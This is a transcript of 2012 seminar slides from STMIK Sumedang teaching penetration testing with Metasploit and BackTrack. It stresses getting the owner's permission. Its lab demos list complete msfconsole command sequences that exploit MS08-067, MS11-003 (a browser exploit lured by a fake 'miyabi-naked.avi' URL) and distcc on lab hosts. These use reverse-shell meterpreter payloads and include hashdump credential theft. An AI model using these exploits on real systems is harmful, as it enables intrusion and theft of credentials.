pentest with metasploit
DESCRIPTION
Pentest with MetasploitTRANSCRIPT
penetration testing with metasploit
Presented by Syarif
!Seminar IT Security Safe The System
Sumedang, April 29 2012 STMIK Sumedang
Agenda
• Why & What’s Penetration Testing ( Pentest )
• << back|track Overview
• Metasploit Basics & Meterpreter
• DEMO :)
Whoami
• geek & Pentester
• infosec trouble maker
• InfoSec enthusiast
• CyberCrime investigator
• Lecture & Engineer
Why Pentest ?
• Millions of dollars have been invested in security programs to protect critical infrastructure to prevent data breaches *1)
• Penetration Test is one of the most effective ways to identify weaknesses and deficiencies in these programs *1)
What’s Penetration Testing
• A method to evaluate the security of computer system / network
• Practice ( attacking ) an IT System like a ‘hacker’ does
• Find security holes ( weaknesses )
• Bypass security mechanism
• Compromise an organization’s IT system security
Must have permission from IT system owner !
illegal activity put you in Jail
Ethics
• Think before act
• Don’t be stupid
• Don’t be malicious
Pentest Phases
Vulnerability Analysis
Information Gathering
Exploitation
Post Exploitation
Reporting
<< back|track overview
• Let’s Watch the Video :)
<< back|track overview
• .
The Most Advanced Linux Security Distribution
Open Source & Always be
Developed for Security Professional
Real World Pentesting Tools
<< back|track overview
<< back|track overview
What’s
• Not just a tool, but an entire framework *1)
• an Open source platform for writing security tools and exploits *2)
• Easily build attack vectors to add its exploits, payloads, encoders,
• Create and execute more advanced attack
• Ruby based
Metasploit interfaces
• MSFconsole
• MSFcli
• msfweb, msfgui ( discontinued )
• Metasploit Pro, Metasploit Express
• Armitage
MSFconsole
MSFcli
Metasploit Terminology
• Exploit : code that allow a pentester take some advantages of a flaw within system,application, or service *1)
• Payload : code that we want the target system to execute ( few commands to be executed on the target system ) *1)
• Shellcode : a set of instructions used as payload when exploitation occurs *1)
• Module : a software that can be used by metasploit *1)
• Listener : a component for waiting an incoming connection *1)
How does exploitation works
attacker
exploit + payload
vulnerable server
1
exploit run , then payload run2
3 Upload / Download data
Traditional Pentest Vs Metasploit
Public Exploit Gathering
Change offsets
Replace ShellCode
Load Metasploit
Choose the target OS
Use exploit
SET Payload
Execute
Traditional Pentest Metasploit for Pentest
Meterpreter
• as a payload after vulnerability is exploited *1)
• Improve the post exploitation
Meterpreter
Exploiting a vulnerability
Select a meterpreter as a payload
meterpreter shell
Meterpreter command
Meterpreter command
Meterpreter command
Meterpreter command
Meterpreter command
Pentest Scenario
attacker vulnerable OS on VMware
* : Ubuntu 8.04 metasploitable
*
OS in the Lab• BackTrack 5 R 2
• IP address : 172.16.240.143
• Windows Xp SP 2
• IP address : 172.16.240.129
• Windows 2003 Server
• IP address : 172.16.240.141
• Windows 7
• IP address : 172.16.240.142
• Ubuntu Linux 8.04 ( Metasploitable )
• IP address : 172.16.240.144
Windows XP Exploitation
• msf > search windows/smb
• msf > info exploit/windows/smb/ms08_067_netapi
• msf > use exploit/windows/smb/ms08_067_netapi
• msf exploit(ms08_067_netapi) > show payloads
• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129
• msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > exploit
• meterpreter > background
• session -l
Windows XP Post Exploitation
• session -i 1
• meterpreter > getsystem -h
• getuid
• hashdump
Windows 2003 Server Exploitation
• msf > search windows/smb
• msf > info exploit/windows/smb/ms08_067_netapi
• msf > use exploit/windows/smb/ms08_067_netapi
• msf exploit(ms08_067_netapi) > show payloads
• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129
• msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > exploit
• meterpreter > background
• session -l
Windows 7 Exploitation
• msf > use exploit/windows/browser/ms11_003_ie_css_import
• msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms11_003_ie_css_import) > show options
• msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.240.143
• msf exploit(ms11_003_ie_css_import) > set SRVPORT 80
• msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-naked.avi
• msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.240.143
• msf exploit(ms11_003_ie_css_import) > set LPORT 443
• msf exploit(ms11_003_ie_css_import) > exploit
Just wait until the victim open the url http://172.16.240.143:80/miyabi-naked.avi
Windows 7 Exploitation
• msf exploit(ms11_003_ie_css_import) > sessions -l
• msf exploit(ms11_003_ie_css_import) > sessions -i 1
• meterpreter > sysinfo
• meterpreter > shell
Ubuntu 8.04 Metasploitable Exploitation
• search distcc
• use exploit/unix/misc/distcc_exec
• show payloads
• set PAYLOAD cmd/unix/reverse
• show options
• set rhost 172.16.240.144
• set lhost 172.16.240.143
• exploit
Greet & Thanks To
• BackTrack Linux
• Metasploit Team ( HD Moore & rapid7 )
• Offensive Security / Metasploit Unleashed
• David Kennedy
• Georgia Weidman
References !
!
• 1. Metasploit The Penetration Tester’s Guide : David Kennedy , Jim O’Gorman, Devon Kearns, Mati Aharoni
• 2. http://www.metasploit.com
• 3. http://www.offensive-security.com/metasploit-unleashed/Main_Page
• 4. http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines